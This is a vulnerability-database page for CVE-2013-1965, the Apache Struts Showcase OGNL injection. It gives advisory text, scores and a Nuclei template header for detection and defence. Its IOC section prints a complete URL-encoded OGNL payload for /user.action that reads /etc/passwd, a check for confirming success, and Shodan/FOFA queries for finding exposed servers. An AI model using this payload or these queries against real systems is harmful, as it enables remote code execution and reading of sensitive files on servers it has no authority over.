CVE-2013-1965
published 2013-07-10CVE-2013-1965: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted…
PriorityP276critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
93.81%
99.8th percentile
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | >= 2.0.0 < 2.3.14.1 | 2.3.14.1 |
| apache | struts2-showcase | 2.0.0 – 2.3.13 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/user.action
commandname=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
- →Exploit targets POST requests to /user.action with a crafted OGNL payload in the 'name' parameter using URL-encoded %{...} expression syntax
- →Content-Type header is application/x-www-form-urlencoded for the exploit POST request
- →Successful exploitation returns HTTP 200 with /etc/passwd content matching root:.*:0:0: in the response body
- →Shodan queries to identify exposed Struts2 instances: http.html:"apache struts", http.title:"struts2 showcase", http.html:"struts problem report"
- →The second OGNL evaluation occurs when the redirect result reads the injected value from the stack and uses it as a redirect parameter, bypassing Struts and OGNL library protections ↗
- →FOFA queries to identify exposed Struts2 instances: body="struts problem report", title="struts2 showcase", body="apache struts"
- ·The vulnerability is specific to the Struts2 Showcase App (2.0.0–2.3.13); the exploit path /user.action is tied to the Showcase application and may differ in other deployments ↗
- ·Prior fixes for S2-003, S2-005, and S2-009 only partially closed the OGNL injection vector; this CVE exploits the redirect result evaluation path which those fixes did not address ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Improper Control of Generation of Code in Apache Struts
osv·2022-05-14
CVE-2013-1965 [HIGH] Improper Control of Generation of Code in Apache Struts
Improper Control of Generation of Code in Apache Struts
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
GHSA
Improper Control of Generation of Code in Apache Struts
ghsa·2022-05-14
CVE-2013-1965 [HIGH] CWE-94 Improper Control of Generation of Code in Apache Struts
Improper Control of Generation of Code in Apache Struts
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
Red Hat
struts2: remote command execution in Showcase app
vendor_redhat·2013-05-22·CVSS 9.3
CVE-2013-1965 [CRITICAL] struts2: remote command execution in Showcase app
struts2: remote command execution in Showcase app
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
Statement: A previous statement by Red Hat related to this CVE, prior to August 2019, said that Apache Struts 2 is not included in any Red Hat products. This earlier statement was incorrect. While Struts 2 is not actively compiled, shipped, used, or enabled in any Red Hat provided final products, and does not cause any vulnerability in the product, struts2-core jars have been included in some products' source code packages. The inclusion was part of an import of the Google Guice repository, which includes struts2-core
No detection rules found.
Nuclei
Apache Struts2 S2-012 RCE
nuclei·CVSS 9.3
CVE-2013-1965 [CRITICAL] Apache Struts2 S2-012 RCE
Apache Struts2 S2-012 RCE
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
Template:
id: CVE-2013-1965
info:
name: Apache Struts2 S2-012 RCE
author: pikpikcu
severity: critical
description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution on the affected server.
remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
reference:
2013-07-10
Published